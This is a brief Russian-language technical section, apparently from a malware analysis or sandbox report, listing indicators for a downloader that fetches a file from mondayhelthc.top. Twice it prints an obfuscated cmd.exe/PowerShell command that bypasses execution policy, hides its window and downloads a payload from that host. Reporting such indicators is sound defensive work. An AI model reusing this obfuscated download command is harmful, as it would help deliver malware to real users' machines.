Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^E^RSh^eLL.e^X^e^ ^-E^X^E^CUti^ONPO^lICY By^PASS ^-NO^PRO^F^I^Le ^-Wi^nD^OWstyLe^ ^HI^DDE^N (^NEW^-OBjECt ^S^ys^tEm^.N^ET.^W^EBCLiE^Nt).^d^Ow^NL^Oa^dFi^Le^('http://mondayh...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "pow^E^RSh^eLL.e^X^e^ ^-E^X^E^CUti^ONPO^lICY By^PASS ^-NO^PRO^F^I^Le ^-Wi^nD^OWstyLe^ ^HI^DDE^N (^NEW^-OBjECt ^S^ys^tEm^.N^ET.^W^EBCLiE^Nt).^d^Ow^NL^Oa^dFi^Le^('http://mondayh...' (со скрытым окном)